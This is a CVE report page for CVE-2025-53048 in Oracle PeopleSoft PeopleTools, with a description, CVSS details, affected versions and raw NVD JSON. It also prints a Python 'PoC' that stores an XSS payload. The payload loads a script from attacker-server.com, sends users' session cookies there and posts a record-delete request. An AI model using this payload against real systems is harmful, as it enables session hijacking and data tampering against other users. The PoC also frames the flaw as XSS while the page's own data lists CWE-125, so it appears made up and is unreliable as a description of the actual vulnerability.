Security Vulnerability Report
中文
CVE-2025-53048 CVSS 5.4 MEDIUM

CVE-2025-53048

Published: 2025-10-21 20:20:42
Last Modified: 2025-10-23 16:06:50
Source: [email protected]

Description

Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Rich Text Editor). Supported versions that are affected are 8.60, 8.61 and 8.62. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:*:*:*:*:*:*:*:* - VULNERABLE
Oracle PeopleSoft Enterprise PeopleTools 8.60
Oracle PeopleSoft Enterprise PeopleTools 8.61
Oracle PeopleSoft Enterprise PeopleTools 8.62

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53048 - Oracle PeopleSoft PeopleTools Rich Text Editor XSS PoC # This PoC demonstrates the XSS vulnerability in the Rich Text Editor component # Affected versions: 8.60, 8.61, 8.62 import requests from urllib.parse import urljoin TARGET_URL = "https://target-peoplesoft-server:port" USERNAME = "low_priv_user" PASSWORD = "password123" def exploit_xss(): """ Exploit the Rich Text Editor XSS vulnerability in PeopleSoft PeopleTools. The vulnerability allows injecting malicious scripts through the RTE component that will be executed when other users view the affected content. """ session = requests.Session() # Step 1: Authenticate to PeopleSoft with low-privilege credentials login_url = urljoin(TARGET_URL, "/psc/ps/EMPLOYEE/CRM/c/NUI_FRAMEWORK.PT_LANDINGPAGE.GBL") login_data = { "userid": USERNAME, "pwd": PASSWORD, "ptmode": "F" } session.post(login_url, data=login_data) # Step 2: Navigate to a page with Rich Text Editor rte_url = urljoin(TARGET_URL, "/psc/ps/EMPLOYEE/CRM/c/CONTENT.MANAGEMENT.GBL") # Step 3: Inject malicious payload through the Rich Text Editor # The RTE fails to properly sanitize HTML/JavaScript content xss_payload = { "content": """<img src=x onerror=" var s=document.createElement('script'); s.src='https://attacker-server.com/steal.js'; document.body.appendChild(s); // Exfiltrate session cookies new Image().src='https://attacker-server.com/collect?c='+document.cookie; // Perform unauthorized actions fetch('/psc/ps/EMPLOYEE/CRM/c/DATA.UPDATE.GBL', { method:'POST', body:new URLSearchParams({action:'delete',id:'target_record'}) }); ">""", "submit": "Save" } response = session.post(rte_url, data=xss_payload) if response.status_code == 200: print("[+] Malicious content injected successfully") print("[+] Payload will execute when other users view this content") return True else: print(f"[-] Failed to inject payload. Status: {response.status_code}") return False if __name__ == "__main__": exploit_xss()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53048", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:42.463", "lastModified": "2025-10-23T16:06:49.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Rich Text Editor). Supported versions that are affected are 8.60, 8.61 and 8.62. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.60", "versionEndIncluding": "8.62", "matchCriteriaId": "9FDC7CAF-BD83-4D24-B199-0438570DDB47"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.